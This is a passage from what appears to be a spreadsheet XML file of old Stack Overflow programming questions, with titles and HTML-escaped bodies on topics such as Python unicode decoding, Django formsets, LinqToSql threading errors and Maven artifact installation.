&lt;p&gt;On the downside, it would be harder to look at the code and determine exactly what happens - especially if a developer is not familiar with the LazyProperty class. &lt;/p&gt;
&lt;p&gt;What do you think ? Is this a good idea or should I abandon it ? 
Also, is the implicit operator a good idea, or would you prefer to use the Value property explicitly if you should be using this class ? &lt;/p&gt;
&lt;p&gt;Opinions and suggestions are welcomed :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>unicode() vs. str.decode() for a utf8 encoded byte string (python 2.x)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any reason to prefer &lt;code&gt;unicode(somestring, 'utf8')&lt;/code&gt; as opposed to &lt;code&gt;somestring.decode('utf8')&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;My only thought is that &lt;code&gt;.decode()&lt;/code&gt; is a bound method so python may be able to resolve it more efficiently, but correct me if I'm wrong.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can Windows API calls to an application/service be monitored?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company is looking at implementing a new VPN solution, but require that the connection be maintained programatically by our software. The VPN solution consists of a background service that seems to manage the physical connection and a command line/GUI utilty that initiates the request to connect/disconnect. I am looking for a way to "spy" on the API calls between the front-end utilty and back-end service so that our software can make the same calls to the service. Are there any recommended software solutions or methods to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reflection runtime performance - Java vs CLR</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A related post &lt;a href="http://stackoverflow.com/questions/435553/java-reflection-performance"&gt;here&lt;/a&gt; pretty much established reflection in Java as a performance hog. Does that apply to the CLR as well? (C#, VB.NET, etc). &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;EDIT&lt;/em&gt;&lt;/strong&gt;: How does the CLR compare to Java when it comes to reflection? Was that ever benchmarked?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java sort String array of file names by their extension</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an array of filenames and need to sort that array by the extensions of the filename. Is there an easy way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight Button Click Event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a silverlight page with a textblock and button on it. Like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;TextBlock x:Name="txbNote" Margin="50,50" Text="Hello"/&amp;gt;        
&amp;lt;Button x:Name="btnCheck" Height="40"  Click="btnCheck_Click" ClickMode="Press" Margin="50,50,50,50" Content="Check Service"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the handler for the click event:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub btnCheck_Click(ByVal sender As Object, ByVal e As EventArgs) 'Handles btnCheck.Click
  txbNote.Text = "I Was Clicked"
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works... but...
Why doesn't this work?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Button x:Name="btnCheck" Height="40"  Click="btnCheck_Click" ClickMode="Press" Margin="50,50,50,50" Content="Check Service"/&amp;gt;
&amp;lt;TextBlock x:Name="txbNote" Margin="50,50" Text="Hello"/&amp;gt;        
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The only change is the relative position of the textblock and button. The button's click event (and every other event I tried) just doesn't fire unless the textblock is before the button in the xaml.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I build project files and packages for Borland C++ Builder 5 from the command line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I build Borland C++ project files (bpr) and package files (bpk) from the command line?  Project groups (bpg) are apparently make files and can be compile with make.  But bpks and bprs are xml based and the Export to Makefile won't compile with make.
If I put a project in a bpg, make can't seem to find any of the files specified in the bpg since they all appear to be relative references.  I changed the references to absolutes and make reports:
    Fatal: Unable to open makefile&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I detect if jQuery is in a document navigated to in the WinForm WebBrowser control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Windows Forms application in C#/Visual Studio 2008 with an IE WebBrowser control.  In the DocumentCompleted event, I want to search the WebBrowser.Document or WebBrowser.DomDocument to see if jQuery is already present in the page.&lt;/p&gt;
&lt;p&gt;What's a good way to accomplish this?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash Video Players: Do people really use the volume control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im wondering if anyone has any input on this subject? Im building a flash video player, and I have added a mute volume icon, but Im wondering what everyone's thoughts are on adding a volume control too?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can i remove the sidebar in movable type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;im building a new side with movable type. And i want to remove the sidebar for a few pages, but not for all the pages.&lt;/p&gt;
&lt;p&gt;Any idea?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Quick way to change a property on many forms in a Delphi project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought there was something in GExperts to do this, but I can't see it if there is.&lt;/p&gt;
&lt;p&gt;I have to change the SCALED property (from the default of TRUE to FALSE) in each form in a project that contains about 100 different forms. Because the default value of SCALED is TRUE, it doesn't actually appear as a line in the .DFM file (when viewing as text), so there isn't anything I can 'get' at with GREP (etc).&lt;/p&gt;
&lt;p&gt;Can anyone suggest a quick way of setting this property in all these forms? The forms are subclasses of various different classes and I really don't want to do make some kind of intermediate TForm descendant which overrides the SCALED property - partly because I tried (briefly) to do this and discovered that setting the SCALED property to be false &lt;em&gt;after&lt;/em&gt; the inherited create made no difference to the form, and setting it &lt;em&gt;before&lt;/em&gt; the inherited create caused an exception. :-)&lt;/p&gt;
&lt;p&gt;Anyone got any suggestions? I really want to avoid opening all those forms one by one if I can help it, if only because I'm bound to miss one!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Downloading files using Adobe AIR</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I download a file using URLStream and write to a file using FileStream, where else do the file gets cached? It definitely gets cached somewhere, as the second time I try to download the same file, it comes down like a lighting..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why am I getting 'System.__ComObject' from my LDAP property?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'll be the first to admit that this is cut and past programming.  I've never looked at AD before, and really don't understand it.  I suppose that's my next study...&lt;/p&gt;
&lt;p&gt;Anyways, This is some test code, which should display the expiry date -- either as something readable, or in ticks -- it doesn't matter. (It's a web form, which is running on the dev webserver.)&lt;/p&gt;
&lt;p&gt;What I get instead is: "System.__ComObject "&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DirectorySearcher searcher = new DirectorySearcher();
searcher.Filter = String.Format( "(SAMAccountName={0})", "TestA33" );
searcher.PropertiesToLoad.Add( "cn" );
SearchResult result = searcher.FindOne();
DirectoryEntry uEntry = result.GetDirectoryEntry();
String expiry = uEntry.Properties["accountExpires"].Value.ToString(); 
Response.Write( expiry );
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Using "with" statement for CSV files in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use the &lt;code&gt;with&lt;/code&gt; statement directly with CSV files? It seems natural to be able to do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import csv
with csv.reader(open("myfile.csv")) as reader:
    # do things with reader
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But csv.reader doesn't provide the &lt;code&gt;__enter__&lt;/code&gt; and &lt;code&gt;__exit__&lt;/code&gt; methods, so this doesn't work. I can however do it in two steps:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import csv
with open("myfile.csv") as f:
    reader = csv.reader(f)
    # do things with reader
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this second way the ideal way to do it? Why wouldn't they make csv.reader directly compatible with the with statement?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaBeans alternatives?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hate the JavaBeans pattern with a passion that burns like the fire of a thousand suns. Why?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Verbose&lt;/strong&gt;. It's 2009. I shouldn't have to write 7 LOC for a property. If they have event listeners then hold on to your hat.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No type-safe references&lt;/strong&gt;. There is no type-safe way to reference a property. The whole point of Java is that it is type safe, and its most popular pattern is not at all typesafe.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What I would like is something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Customer {
    public Property&amp;lt;String&amp;gt; name = new Property();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am a web developer mostly, so it needs JPA and Wicket support.&lt;/p&gt;
&lt;p&gt;Help me off the javabean train!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unable to parse a DateTime</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to parse a date/time string using &lt;code&gt;DateTime.ParseExact&lt;/code&gt;. It works everywhere, except on one machine - it just will not parse on that machine. The question is: Why? What could be different on that machine so that it will cause this behaviour?&lt;/p&gt;
&lt;p&gt;Here are some things that I've already looked at:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;CultureInfo&lt;/code&gt; is passed to &lt;code&gt;DateTime.ParseExact&lt;/code&gt;, namely &lt;code&gt;CultureInfo.InvariantCulture&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The regional settings on the rogue machine is the same as the settings on a machine where the parsing works.&lt;/li&gt;
&lt;li&gt;Yes, the string is in the correct format, which is &lt;code&gt;dd/MM/yyyy HH:mm:ss&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Is a URL which uses a Rewrite URL still searchable by search engines?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My developer did the following:&lt;/p&gt;
&lt;p&gt;If someone types public.sample.com/user/chumbawumba it redirects to stage.sample.com/profile.php?username=chumbawumba&lt;/p&gt;
&lt;p&gt;I want to make sure that the content of the profile -- which contains company information for example, is searchable on the public.sample.com domain name.&lt;/p&gt;
&lt;p&gt;He used a Rewrite Rule. &lt;/p&gt;
&lt;p&gt;I guess I wasn't anticipating this approach, but as long as the pages can get spidered and ranked as more information is put in, I'm cool with it.&lt;/p&gt;
&lt;p&gt;I tried to run an online sitemap on the site and I don't think it came up with anything, thus my question.  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Seeking Example Delphi Prism ASP.Net Application using SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm an ASP.NET virgin and want to try creating an ASP.Net Application using SQL Server at the back end.&lt;/p&gt;
&lt;p&gt;I can't locate a single example application or code for doing this.  Anyone have any pointers?&lt;/p&gt;
&lt;p&gt;TIA&lt;/p&gt;
</t>
  </si>
  <si>
    <t>About Memory Management in Java and C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Well, I've been given an assignment to basically figure out how memory allocation works for whatever language I'll be using. After some research, I have some questions and doubts which I'd like to get some insight in. For example:&lt;/p&gt;
&lt;p&gt;I read &lt;a href="http://en.citizendium.org/wiki/Stack_frame" rel="nofollow"&gt;here&lt;/a&gt; that Java specifies exactly how the stack contents are organized. Looking at the &lt;a href="http://java.sun.com/docs/books/jvms/second_edition/html/Overview.doc.html#17257" rel="nofollow"&gt;JVM spec structure&lt;/a&gt;, it basically says the stack contains frames, and that the frames contain whatever is inside the class by properly allocating the variables and functions. Maybe I am missing something here, but I don't understand how this is any different than what C++ does. I ask because the first link says Java's specification of stack contents avoid compiler incompatibilities.&lt;/p&gt;
&lt;p&gt;Also, I have yet to find how the memory segments are exactly organized on top of each other. For example, I know the memory is divided into global variables, call stack, heap and code for C++, yet I don't know if the heap's address is higher than the stack's, or if that depends on the implementation. I also wonder whether a Java program has more than that, and how it would be laid out as well. I imagine there is a standard, since the JVM has to know where it all is to use it, though I suppose it could just have the pointers and leave the rest to the OS. I imagine too, that there must be at least a de facto standard.&lt;/p&gt;
&lt;p&gt;Another the thing I don't understand is the runtime constant pool. It's supposed to be "a per-class or per-interface runtime representation of the constant_pool table in a class file", but I don't think I understand what it does. It seems to have a tag to indicate what type the structure in question is? Then the name of the structure (given by the programmer or assigned by the underlying system?) Then it seems the rest of it varies with whatever the tag describes (a thread, an array, etc).&lt;/p&gt;
&lt;p&gt;If my interpretation of the runtime constant pool is right, then why are they necessary as well as stack frames? Is it because stack frames only take care of the stack segments, and the runtime constant pool must also have pointers for the heap allocated memory?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How much time it saves code generators?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My question seems easy but is little more theoretical than it looks.  There are Code Generation software or application building software that gets done without the use of a programming language.  Application like VE Server and VE Designer from &lt;a href="http://www.intelliun.com/" rel="nofollow"&gt;Intelliun&lt;/a&gt; should accomplish this task.  My question is, in reality have someone out there track the amount of real savings of this kind of tool versus having a development team and a source code evolutionary process.&lt;/p&gt;
&lt;p&gt;For the specific example of VE Designer the application gets done from the designer and you don't see code for it, you just run the app in VE Server.  All code looks like XML Internal commands.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does C# limit the set of types that can be declared as const?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Compiler error &lt;a href="http://msdn.microsoft.com/en-us/library/ms228656(VS.80).aspx"&gt;CS0283&lt;/a&gt; indicates that only the basic POD types (as well as strings, enums, and null references) can be declared as &lt;code&gt;const&lt;/code&gt;. Does anyone have a theory on the rationale for this limitation? For instance, it would be nice to be able to declare const values of other types, such as IntPtr.&lt;/p&gt;
&lt;p&gt;I believe that the concept of &lt;code&gt;const&lt;/code&gt; is actually syntactic sugar in C#, and that it just replaces any uses of the name with the literal value. For instance, given the following declaration, any reference to Foo would be replaced with "foo" at compile time.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const string Foo = "foo";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This would rule out any mutable types, so maybe they chose this limitation rather than having to determine at compile time whether a given type is mutable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an easy way to Spellcheck with TinyMCE in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to use TinyMCE in .NET and use the spellchecker without installing PHP as well?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Write a number with two decimal places SQL server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you write a number with two decimal places for sql server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I retrieve an assembly's qualified type name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I generate a assembly qualified type name?&lt;/p&gt;
&lt;p&gt;For an example, when configuring a membership provider, I would have to provide a assembly qualified type name for "SqlMembershipProvider" (in this example, i have copied the below configuration from somewhere) in "type" attribute.&lt;/p&gt;
&lt;p&gt;How do you generate that assembly qualified type name?
Does it have to be typed manually everytime by examining an assembly type?&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;membership&amp;gt;
  &amp;lt;providers&amp;gt;
    &amp;lt;clear /&amp;gt;
    &amp;lt;add name="AspNetSqlMembershipProvider"
           type="System.Web.Security.SqlMembershipProvider,
           System.Web, Version=2.0.0.0,
           Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"
           connectionStringName="LocalSqlServer"/&amp;gt;
  &amp;lt;/providers&amp;gt;
&amp;lt;/membership&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;[UPDATE]&lt;/em&gt;&lt;/strong&gt;: &lt;a href="http://stackoverflow.com/questions/622902/powershell-tips-tricks-for-net-developers/622976#622976"&gt;Simpler PowerShell version&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS&amp;gt;([System.String]).AssemblyQualifiedName
System.String, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Django custom SQL to return QuerySet where each object has additional properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have the following objects: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;squirrel_table 
  - name
  - country_of_origin
  - id
nut_table
  - id
  - squirrel_who_owns_me[fk to squirrel]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to retrieve a list of all squirrels in a particular country. The returned squirrel objects can be in a QuerySet, but do not need to be. A list will suffice. Each squirrel will have an additional property call nut_count. The SQL for this would be something like what follows (please note I use the subquery in order to not enumerate all of squirrel's columns, since in reality there will be many) (I use PostgreSQL):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select sq.*,
       nut_counts.nut_count
  from squirrel_table sq,
      (select sq2.id as squirrel_id,
              count(nuts) as nut_count
         from squirrel_table sq2,
              nut_table nuts
        where nuts.squirrel_who_owns_me = sq2.id
          and sq.country_of_origin = 'USA'
        group by sq2.id) as nut_counts
 where sq.id = nut_counts.squirrel_id
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to execute the SQL, take the cursor it generates, and turn it into a list of squirrel objects, and add the nut_count to each squirrel?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to stop Ideablade DevForce writing to C:\Program Files\AppName\debuglog.xml in Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that uses Ideablade Devforce as it's OR mapper. When the application starts up it wants to write to the debuglog.xml file in C:\Program Files\Application Name\ This works fine in Windows XP, but due to Vista's locked down write access to Program Files, the app throws and error.&lt;/p&gt;
&lt;p&gt;Is there a way to stop Ideablade wanting to write to this file?&lt;/p&gt;
&lt;p&gt;OR&lt;/p&gt;
&lt;p&gt;Is there another place that is recommended to install applications that want to write to files in their install path?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Equivalent? No, but why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;T-SQL:&lt;/p&gt;
&lt;p&gt;1(ANSI):    &lt;code&gt;convert(varchar(10),@DueDate, 102) &amp;lt; convert(varchar(10),getdate(), 102)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;2(USA):    &lt;code&gt;convert(varchar(10),@DueDate, 101) &amp;lt; convert(varchar(10),getdate(), 101)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Notice that these will return different results when year is considered.&lt;/p&gt;
&lt;p&gt;Why?&lt;/p&gt;
&lt;p&gt;What's the difference? Why isn't the operator taking year into consideration when using #2?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox and IE rendering same image differently!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is an exact duplicate of: &lt;a href="http://stackoverflow.com/questions/130161/ie6-issues-with-transparent-pngs"&gt;http://stackoverflow.com/questions/130161/ie6-issues-with-transparent-pngs&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;Firefox:&lt;img src="http://i377.photobucket.com/albums/oo218/prakashrajgopal/FirefoxP.jpg" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;IE 6:&lt;img src="http://i377.photobucket.com/albums/oo218/prakashrajgopal/IEP.jpg" alt="alt text" /&gt;
The background for the image is transparent. Yet IE seems to screw it up. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need help handling documents using dom4j</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;import java.util.Iterator;
import org.dom4j.Document;
import org.dom4j.DocumentHelper;
import org.dom4j.Element;
import org.dom4j.io.XMLWriter;
public class Main {
    public static void main(String[] args){
    	Company cp17 = new Company();
    	Person ps1 = new  Person("Barry","15900000000");
    	Person ps2 = new Person("Andy","15800000000");
    	cp17.employee.add(ps1);
    	cp17.employee.add(ps2);
    	Document document = DocumentHelper.createDocument();
    	Element companyElement = document.addElement("company");
    	for(Iterator&amp;lt;Person&amp;gt; personIter = cp17.employee.iterator();personIter.hasNext();){
    		Person nextEmployee = personIter.next();
    		Element employee = companyElement.addElement("employee");
    		employee.addAttribute("name",nextEmployee.name);
    		employee.addAttribute("phoneNumber",nextEmployee.phoneNumber);
    	}
    	Document document2 = DocumentHelper.createDocument();
        Element compnies = document.addElement("companies");
        //move cp17 to document2 as a child of companies.
        //ERROR companies.add(cp17);
    	XMLWriter xmlWriter = new XMLWriter();
    	try{
    	xmlWriter.write(document2);
    	xmlWriter.close();
    	}
    	catch(Exception e){
    		e.printStackTrace();
    	}
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I creat two Document Object , now I want to move one Element and it's child Elements to another.How can i do that .Can anyone tell me, thank you.^_^&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pre-populate an inline FormSet?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an attendance entry form for a band.  My idea is to have a section of the form to enter event information for a performance or rehearsal.  Here's the model for the event table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Event(models.Model):
    event_id = models.AutoField(primary_key=True)
    date = models.DateField()
    event_type = models.ForeignKey(EventType)
    description = models.TextField()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I'd like to have an inline FormSet that links the band members to the event and records whether they were present, absent, or excused:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Attendance(models.Model):
    attendance_id = models.AutoField(primary_key=True)
    event_id = models.ForeignKey(Event)
    member_id = models.ForeignKey(Member)
    attendance_type = models.ForeignKey(AttendanceType)
    comment = models.TextField(blank=True)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, what I'd like to do is to pre-populate this inline FormSet with entries for all the current members and default them to being present (around 60 members).  Unfortunately, Django &lt;a href="http://groups.google.com/group/django-developers/browse_thread/thread/73af9e58bd7626a8"&gt;doesn't allow initial values in this case.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to manually install an artifact in Maven 2?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've encountered some errors when I tried to install an artifact manually with Maven 2. I wanted to install a jar from a local directory with the command&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mvn install:install-file -Dfile=jta-1.0.1B.jar
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But Maven gave a build error which reads like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Invalid task '.01B.jar': you must
specify a valid lifecycle phase, or a
goal in the format plugin:goal or
pluginGroupId:pluginArtifactId:pluginVersion:goal
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a mistake with my command?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Datagridview custom vscrollbar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like disable vertical scroll bar in datagridview and managing the scrolling using separate vscroll control. I am using c# 2.0. Any one can help....????&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CANopen PDOs and a communication profile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If the data contains more than one value, how do I know what these values represent? And how do I break up the data into individual values? Am I right to say that the relationship between the &lt;a href="http://en.wikipedia.org/wiki/CANopen#Process_Data_Object_.28PDO.29_protocol" rel="nofollow"&gt;PDOs&lt;/a&gt; and data to be transmitted are defined in the communication profile?&lt;/p&gt;
&lt;p&gt;(I thank Matli for having explained that the &lt;a href="http://en.wikipedia.org/wiki/Controller_area_network" rel="nofollow"&gt;CAN&lt;/a&gt; interface API probably has functions to retrieve the ID, data length and the data of a &lt;a href="http://en.wikipedia.org/wiki/CANopen" rel="nofollow"&gt;CANopen&lt;/a&gt; message. Based on the explanation, one could tell if the frame is a PDO and derive the sender node's ID from the COB-ID.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mysql and check boxes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have this table contains name and value, how can i convert the contents of&lt;/p&gt;
&lt;p&gt;$row=mysql_fetch_array($result);&lt;/p&gt;
&lt;p&gt;into check boxes&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why the functions doesn't execute completely?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I try to debug the following function segment, the execution brakes (jumps out of the function) at line pCellTower-&gt;m_pCellTowerInfo = pCellInfo:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RILCELLTOWERINFO* pCellInfo = (RILCELLTOWERINFO*)lpData;
CCellTower *pCellTower = (CCellTower*)cbData;
if(pCellTower != NULL)
{
    pCellTower-&amp;gt;m_pCellTowerInfo = pCellInfo;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(the pointer pCellInfo is not set)&lt;/p&gt;
&lt;p&gt;Then I tried to comment the line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RILCELLTOWERINFO* pCellInfo = (RILCELLTOWERINFO*)lpData;
CCellTower *pCellTower = (CCellTower*)cbData;
if(pCellTower != NULL)
{
    //pCellTower-&amp;gt;m_pCellTowerInfo = pCellInfo;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and this way the function executes normally.&lt;/p&gt;
&lt;p&gt;Does anyone know what could be wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is mixing WPF, LinqToSql and multiple threads a bad idea?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My situation is roughly similar to &lt;a href="http://forums.microsoft.com/msdn/ShowPost.aspx?PostID=3227644&amp;amp;SiteID=1" rel="nofollow"&gt;this guy&lt;/a&gt; except that I don't need change notifications right now&lt;/p&gt;
&lt;p&gt;I have a WPF App displaying a hierarchy. The children for each node are retrieved using a LinqToSql query. The app works perfectly when there is one thread.&lt;/p&gt;
&lt;p&gt;Now I'd like to make things a bit faster.. by loading children asynchronously. Fire off a thread, to do the DB fetching, on completion create the corresponding tree nodes for the children. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;HierarchicalDataTemplate DataType="{x:Type viewmodels:NodeDM}" ItemsSource="{Binding Path=Children}"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After some thrashing around yesterday, I found that WPF Data Binding allows this via an &lt;code&gt;IsAsync&lt;/code&gt; property on the Binding. So I made the following change&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;HierarchicalDataTemplate .. ItemsSource="{Binding Path=Children, IsAsync=True}"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now its mayhem, an initial bunch of nodes pass through the fire before exceptions run riot. Pasting the first one here...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Windows.Data Error: 16 : Cannot get 'Children' value (type 'ObservableCollection`1') from '' (type 'NodeDM'). BindingExpression:Path=Children; DataItem='NodeDM' (HashCode=29677729); target element is 'TreeViewItem' (Name=''); target property is 'ItemsSource' (type 'IEnumerable') TargetInvocationException:'System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---&amp;gt; System.InvalidCastException: Specified cast is not valid.
   at System.Data.SqlClient.SqlBuffer.get_Int32()
   at System.Data.SqlClient.SqlBuffer.get_Value()
   at System.Data.SqlClient.SqlDataReader.GetValueInternal(Int32 i)
   &amp;lt;snipped around 20-30 lines&amp;gt;
   at System.Data.Linq.Table`1.GetEnumerator()
   at System.Data.Linq.Table`1.System.Collections.Generic.IEnumerable&amp;lt;TEntity&amp;gt;.GetEnumerator()
   at System.Linq.Lookup`2.CreateForJoin(IEnumerable`1 source, Func`2 keySelector, IEqualityComparer`1 comparer)
   at System.Linq.Enumerable.&amp;lt;JoinIterator&amp;gt;d__61`4.MoveNext()
   at System.Linq.Enumerable.WhereSelectEnumerableIterator`2.MoveNext()
   at ICTemplates.Models.NodeDM.Load_Children()
   at ICTemplates.Models.NodeDM.get_Children()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Others include&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.InvalidOperationException: There is already an open DataReader associated with this Command which must be closed first.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a deformed tree where some nodes have failed to load. I have a &lt;strong&gt;singleton instance&lt;/strong&gt; of the almightly LinqToSql DataContext class, which talks to the DB. So I tried putting a lock so that multiple worker threads do not access it simultaneously..  but no luck.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;partial class Node
{
  public IEnumerable&amp;lt;Segment&amp;gt; Children
  {
    lock (MyDatabaseDataContext.m_lockObject)
    {
      return // LINQ Query to join 2 tables and return a result
    }
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Reverting the IsAsync change makes things all good again. 
Why is the IsAsync property messing up LinqToSql ? The WPF Treeview is enough to make normal people pull their hair out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vim regular expression to remove all but last two digits of number</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have following text in a file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;23456789
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I tried to replace the above text using command           &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1,$s/\(\d\)\(\d\d\d\)\(\d\d\)*\&amp;gt;/\3\g
&lt;/code&gt;&lt;/pre&gt;
